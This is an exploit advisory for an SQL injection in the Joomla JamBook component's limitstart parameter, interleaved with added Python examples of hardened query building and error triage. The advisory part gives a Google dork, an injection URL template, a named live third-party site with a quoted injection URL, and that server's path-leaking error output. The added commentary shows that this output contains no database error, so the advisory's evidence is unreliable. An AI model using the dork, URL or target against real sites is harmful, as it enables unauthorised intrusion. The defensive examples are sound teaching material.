- ####################################################################
- # Exploit Title : Joomla JamBook Component 1.5 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 01/02/2019
- # Vendor Homepage : joomlacode.org
- # Software Download Link : joomlacode.org/gf/project/jambook/
- # Software Version : 1.0 and 1.5
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_jambook''
- Developed by MATspot.net. Optimised for Mozilla Firefox
- # Vulnerability Type : CWE-89 [ Improper Neutralization of
- Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- ####################################################################
- # Description about Software :
- ***************************
- Jambook is a feature rich open source Joomla guestbook component with spam
- protection, email address cloaking, flood protection, double posting checks
- and the ability to use Joomla wysiwyg editor, even for guests!
- It shows guestbook entries from the Jambook component.
- It has been written from scratch to be easy to use and
- yet have powerful functionality for the administrator.
- Two extra extensions for Jambook have been released:
- Jx Show Jambook
- This module allows you to list Jambook entries elsewhere on your site.
- Jx Jambook Search
- A search plugin (mambot) to add Jambook search to the standard Joomla search.
- ####################################################################
- # Impact :
- ***********
- The JamBook 1.5 component for Joomla! is prone to an SQL injection
- vulnerability because it fails to sufficiently sanitize the user-supplied
- limitstart parameter (the pagination offset) before using it in an SQL query.
- A remote attacker can send a specially crafted request to the vulnerable
- application and inject SQL into the query built from that parameter.
- Depending on the structure of the affected query and the database configuration,
- a successful exploit may allow the attacker to access or modify data in the
- application's database, or to exploit latent vulnerabilities in the underlying
- database server. No special tooling is required: the issue can be triggered from a browser.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_jambook&Itemid=[ID-NUMBER]&task=list&sort=createddesc&limit=[ID-NUMBER]&limitstart=[SQL Injection]
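The following is an added worked example, not code from the advisory or from the JamBook project. It models in Python, against an in-memory SQLite table filled with constructed guestbook rows, the CWE-89 pattern the PoC above relies on (the limitstart request parameter interpolated straight into the LIMIT/OFFSET clause) next to a hardened builder that casts the value to an integer, as PHP's intval() would, and binds it as a parameter. The table name, its columns and the exact shape of JamBook's query are assumptions. SQLite stands in for MySQL only to reproduce the broken-query symptom that the quote in the PoC URL produces; MySQL's LIMIT accepts integer literals only, so expression tricks that happen to work in SQLite do not carry over.

```python
import sqlite3

# Constructed sample data for a hypothetical guestbook table; JamBook's real
# schema is not known from the advisory.
ROWS = [(i, f"guest{i}", f"entry {i}", f"2019-01-{i:02d}") for i in range(1, 11)]


def make_db():
    """Build an in-memory SQLite database holding the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE jambook (id INTEGER, name TEXT, body TEXT, created TEXT)")
    con.executemany("INSERT INTO jambook VALUES (?, ?, ?, ?)", ROWS)
    return con


def vulnerable_query(con, limit, limitstart):
    """Models the flaw: request parameters are interpolated into the LIMIT clause
    as text, so any non-numeric value (such as the %27 in the PoC URL) reaches
    the SQL parser and can break or alter the statement."""
    sql = (
        "SELECT id, name FROM jambook ORDER BY created DESC "
        f"LIMIT {limit} OFFSET {limitstart}"
    )
    return sql, con.execute(sql).fetchall()


def hardened_query(con, limit, limitstart):
    """Coerce both values to non-negative integers (the equivalent of intval())
    and bind them as parameters, so user input can never change the statement."""
    limit = max(0, int(limit))
    limitstart = max(0, int(limitstart))
    sql = "SELECT id, name FROM jambook ORDER BY created DESC LIMIT ? OFFSET ?"
    return sql, con.execute(sql, (limit, limitstart)).fetchall()


def run_case(limitstart, limit=5):
    """Feed one limitstart value to both builders and report what each did.

    Returns a dict with a ("ok", row_count) tuple per builder, or
    ("sql_error", message) when the interpolated query fails to parse and
    ("rejected", reason) when the hardened builder refuses the input.
    """
    con = make_db()
    out = {}
    try:
        _, rows = vulnerable_query(con, limit, limitstart)
        out["vulnerable"] = ("ok", len(rows))
    except sqlite3.Error as exc:
        out["vulnerable"] = ("sql_error", str(exc))
    try:
        _, rows = hardened_query(con, limit, limitstart)
        out["hardened"] = ("ok", len(rows))
    except ValueError:
        out["hardened"] = ("rejected", "non-numeric limitstart")
    return out


if __name__ == "__main__":
    # A benign offset behaves identically in both builders; the quoted offset
    # from the PoC breaks the interpolated query and is rejected by the hardened one.
    for value in ("8", "200", "200'"):
        print(repr(value), run_case(value))
```

The observable the advisory leans on is the first case of the third line: the interpolated builder hands `OFFSET 200'` to the parser and gets a syntax error back, which on a Joomla 1.0 host with verbose errors enabled shows up in the HTTP response. The hardened builder fails closed on the same input and returns the same rows as the vulnerable one for every legitimate offset.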
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- [+] eden.rs.ba/index.php?option=com_jambook&Itemid=31&task=list&sort=createddesc&limit=5&limitstart=200%27
- ####################################################################
- # Example Server Error Output :
- ****************************
- Deprecated: Assigning the return value of new by reference is deprecated in /home/diskocic/public_html/eden.rs.ba/includes/joomla.php on line 836
- Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /home/diskocic/public_html/eden.rs.ba/includes/phpInputFilter/class.inputfilter.php on line 457
- Deprecated: Function split() is deprecated in /home/diskocic/public_html/eden.rs.ba/includes/joomla.php on line 1527
- Deprecated: Function eregi() is deprecated in /home/diskocic/public_html/eden.rs.ba/includes/sef.php on line 533
- Warning: Cannot modify header information - headers already sent by (output started at /home/diskocic/public_html/eden.rs.ba/includes/joomla.php:836) in /home/diskocic/public_html/eden.rs.ba/includes/joomla.php on line 697
- Strict Standards: Non-static method mosCache::getCache() should not be called statically in /home/diskocic/public_html/eden.rs.ba/includes/frontend.php on line 199
- Note : none of the lines above is a database error. They are PHP Deprecated, Warning and
- Strict Standards notices from the Joomla 1.0 core (includes/joomla.php, includes/sef.php,
- mosCache) running on a newer PHP with display_errors enabled. They are triggered by the
- code base itself rather than by the injected quote, so they disclose absolute filesystem
- paths but do not by themselves show that limitstart reaches an SQL query. To confirm the
- injection, compare the response for limitstart=200 with the response for limitstart=200%27
- and look for a MySQL error message or a change in the returned entries.
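As an added example that is not part of the advisory, the triage function below sorts lines of server output into MySQL error signatures versus PHP engine notices, so that a claimed SQL error can be checked before it is reported. Run on the output quoted above it finds only PHP Deprecated, Warning and Strict Standards notices; a second, constructed sample shows what a genuine MySQL syntax error surfacing through PHP and Joomla's database layer looks like. The signature list is a starter set drawn from messages emitted by MySQL, PHP's old mysql extension and Joomla 1.0's database class; the SQL= fragment in the constructed sample is invented for illustration.

```python
import re

# Constructed sample: the six messages quoted in the advisory, one per line.
SAMPLE_OUTPUT = """\
Deprecated: Assigning the return value of new by reference is deprecated in /home/diskocic/public_html/eden.rs.ba/includes/joomla.php on line 836
Deprecated: preg_replace(): The /e modifier is deprecated, use preg_replace_callback instead in /home/diskocic/public_html/eden.rs.ba/includes/phpInputFilter/class.inputfilter.php on line 457
Deprecated: Function split() is deprecated in /home/diskocic/public_html/eden.rs.ba/includes/joomla.php on line 1527
Deprecated: Function eregi() is deprecated in /home/diskocic/public_html/eden.rs.ba/includes/sef.php on line 533
Warning: Cannot modify header information - headers already sent by (output started at /home/diskocic/public_html/eden.rs.ba/includes/joomla.php:836) in /home/diskocic/public_html/eden.rs.ba/includes/joomla.php on line 697
Strict Standards: Non-static method mosCache::getCache() should not be called statically in /home/diskocic/public_html/eden.rs.ba/includes/frontend.php on line 199
"""

# Constructed sample of what a real leaked MySQL error looks like; the paths,
# table name and SQL= fragment are invented for illustration.
CONSTRUCTED_SQL_ERROR = """\
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/includes/database.php on line 123
DB function failed with error number 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 SQL=SELECT * FROM jos_jambook ORDER BY created DESC LIMIT 200', 5
"""

# Starter list of strings that indicate the database layer actually failed.
SQL_ERROR_PATTERNS = [
    r"You have an error in your SQL syntax",
    r"DB function failed with error number",
    r"supplied argument is not a valid MySQL result",
    r"mysql_(?:fetch|num|query|error)\w*\(\)",
]

# PHP engine diagnostics: these come from the interpreter, not from MySQL.
PHP_NOTICE_RE = re.compile(r"^(Deprecated|Notice|Warning|Strict Standards|Fatal error):")


def classify_line(line):
    """Return 'sql_error', 'php_<level>' or 'other' for one line of output.

    SQL signatures are checked first because a PHP Warning wrapping a mysql_*
    call is evidence of a failed query, not just of a noisy interpreter.
    """
    if any(re.search(pattern, line) for pattern in SQL_ERROR_PATTERNS):
        return "sql_error"
    match = PHP_NOTICE_RE.match(line.strip())
    if match:
        return "php_" + match.group(1).lower().split()[0]
    return "other"


def triage(output):
    """Count categories across all non-empty lines and say whether any line
    is evidence that the injected input reached the database."""
    counts = {}
    for line in output.splitlines():
        if not line.strip():
            continue
        category = classify_line(line)
        counts[category] = counts.get(category, 0) + 1
    return {"counts": counts, "sql_error_observed": counts.get("sql_error", 0) > 0}


if __name__ == "__main__":
    print("advisory output :", triage(SAMPLE_OUTPUT))
    print("constructed     :", triage(CONSTRUCTED_SQL_ERROR))
```

Only a response whose triage reports sql_error_observed, or one whose listed entries change between a plain and a quoted limitstart, supports the claim that the parameter is injectable; the advisory's quoted output reports none.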
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################